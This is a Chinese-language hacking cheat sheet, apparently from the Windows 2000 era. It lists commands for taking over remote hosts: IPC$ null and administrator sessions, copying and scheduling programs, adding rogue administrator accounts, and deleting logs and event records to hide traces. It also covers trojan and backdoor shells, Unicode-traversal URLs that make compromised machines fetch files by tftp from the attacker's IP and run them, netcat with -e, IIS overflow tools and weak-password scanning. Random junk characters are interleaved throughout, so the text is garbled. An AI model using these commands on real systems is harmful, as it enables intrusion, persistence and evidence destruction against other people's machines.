网管和黑客都必须知道的命令
?5%0zMC 常用的几条NET命令:
F?+K~['i INm21MS$ (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
? qn0]. Dm,*G`Js (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
7~t,Pt) :/Zy=F9: (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
X,zqI 8x`?Yc (查看远程主机时间) net time \\IP地址
Zcaec# -SZW[T<N" (定时启动某个程序) at \\IP地址 02:18 readme.exe
zi^T?<t M_o<6C (查看共享) net view \\IP地址
$oefG}h2 9~6FWBt (查看netbios工作组列表) nbtstat -A IP地址
^Fy{Q*p`( Qx9lcO_ (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
a0vg%Z@! D6 2xC5 (这两条把自己增加到管理员组): net user 用户名 密码 /add
mN_KAln h\ZnUn_J net localgroup Administrators 用户名 /add
NH?q/4=I0W ebbC`eFD (断开连接) net use \\IP地址\ipc$ /delete
MKad
5gD*< vgfLI}|5 扫尾:
{X=gjQ9 J/M_cO*U del C:\winnt\system32\logfiles\*.*
y4aW8J# ~^U(G As del C:\winnt\ssytem32\config\*.evt
4g}eqW ;C1]gJZ, del C:\winnt\system32\dtclog\*.*
*x^W`i
HG(J+ocn del C:\winnt\system32\*.log
7XE |5G Q4gsOxP del C:\winnt\system32\*.txt
J|DID+M ]fN\LY6p del C:\winnt\*.txt
PD@]2lY( 67/&AiS? del C:\winnt\*.log
MuzlUW ] +w~<2Kt8 一、netsvc.exe
pw^$WK WU:~T.Su 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
[L.+N@M [4V{~`sF netsvc /list \\IP地址
[25[c><:w" }L.xt88 netsvc schedule \\IP地址 /query
LwpO_/qV DKd:tL24& netsvc \\IP地址 schedule /start
SxC MHs2UN
二、OpenTelnet.exe
M.|@|If4? jhd&\z- 远程启动主机的Telnet服务,并绑定端口到7878,例如:
y{>d&M| k"*A@ OpenTelnet \\IP地址 用户名 密码 1 7878
I]HrtI [P5+}@t 然后就可以telnet到主机的7878端口,进入DOS方式下:
=(ULfz[: 6#sd"JvtQ telnet IP地址 7878
Zt3"4d4 ;T!w$({V0z 三、winshell.exe
J{W<6AK\S f(Vr &X 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
d5/x2!mH8 dQD YN_ p Path (查看winshell主程序的路径信息)
_K(w&Kr 7Y`/w$ b reBoot (重新启动机器)
|7$Fr[2d )<_e{_h
d shutDown (关闭机器)
'&?OhSeN D%L}vugxK s Shell (执行后你就会看到可爱的“C:\>”)
('H[[YODh cG)i: x eXit (退出本次登录会话,此命令并不终止winshell的运行)
H_*;7/& f+#^Lngo CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
!j'9>G{T jH+ddBVA 四、3389登陆器,GUI方式登录远程主机的
X,m6#vLK2 :#CQQ*@ 五、elsave.exe
.M3]\I u n<
npJ* 事件日志清除工具
I[mlQmwsL. }m!L2iK4qk elsave -s \\IP地址 -l "application" -C
3v~804kWB JmHEYPt0 elsave -s \\IP地址 -l "system" -C
(/x%zmY;/U nE$8-*BZ_ elsave -s \\IP地址 -l "security" -C
#\15,!*a= 13+f ^ 执行后成功清除应用程序日志,系统日志,安全日志
QWqEe|}6 >=G-^z: 六、hbulot.exe
6[r-8_ *G'R+_tdE 开启win2kserver和winxp的3389服务
g^ @9SU ,,U8X [A hbulot [/r]
0K+a/G@
n\ k!9LJ%Xh 使用/r表示安装完成后自动重起目标使设置生效。
]r]= Q"/5 2vb {PQ 七、nc.exe(netcat.exe)
>_R,^iH" ^T(v4'7 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
t0^chlJP$ p6UPP|-S 想要连接到某处: nc [-options] hostname port[s] [ports] ...
qnFi./ 7x6q:4Ep\ 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
$~$NQe!/ ]/G~ L 参数:
x~!gGfP nT(Lh/ -e prog 程序重定向,一旦连接,就执行 [危险!!]
BKd03s= 9j[lr${A -g gateway source-routing hop point[s], up to 8
yeI((2L@E2 ~"eQPTd -G num source-routing pointer: 4, 8, 12, ...
Zo=w8Hr y `)oD0)Fj -h 帮助信息
;nzzt~aCC UbWeE,T~S -i secs 延时的间隔
bSK> p3 %Z:07|57I[ -l 监听模式,用于入站连接
S,Y\ox- `5J`<BPs -n 指定数字的IP地址,不能用hostname
<B+xE?v4 itH`
s<E -o file 记录16进制的传输
17hFwo` ';HNQe?vT
-p port 本地端口号
k15fy"+Ut <i<[TPv"; -r 任意指定本地及远程端口
#CRAQ#:45( 8`I/\8;H'p -s addr 本地源地址
m+jW+ **RW
9FU -u UDP模式
71g\fGG\
FQ"
;v" -v 详细输出——用两个-v可得到更详细的内容
E0SP Ao2m"ym -w secs timeout的时间
49e~/YY _0razNk -z 将输入输出关掉——用于扫描时
o%~PWA*Qp 八、TFTPD32.EXE
(toN??r @,=E[c
8 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
Q')0 T>F- UNoNsmP http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
ptA-rX. H@j
D% 然后可以直接令文件运行:
]j^V5y" \v*WI)] http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
P%CNu ZRD@8'1p 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
_QS +{
@P$_2IU" 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
f^EDiG>b` iJ7?6)\ 一、一 Xscan命令行运行参数说明:
i&%/]Nq Gtyy^tz[ 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
@D'NoA@1A [6$n 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
8/tvS8I#y L_k'r\L xscan -file <主机列表文件名> <检测项目> [其他选项]
Em(&cra [|:kS 其中<检测项目> 含义如下:
*j`{ K @~Uu]1 -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
XSw!_d XAnN< -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
A.D@21py e2P
ds` -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
Y NRorE
LKEf#mp -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
m\XgvpvrP ;q3"XLV(T[ -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
aYmC LLj oX;D|8f [其他选项] 含义如下:
+O2z&a;q figCeJ!W4 -v: 显示详细扫描进度
:*/'W5iM A-8[8J -p: 跳过Ping不通的主机
`Tt;)D )J['0DUrZK -o: 跳过没有检测到开放端口的主机
rEM#J"wF $;1TP| -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10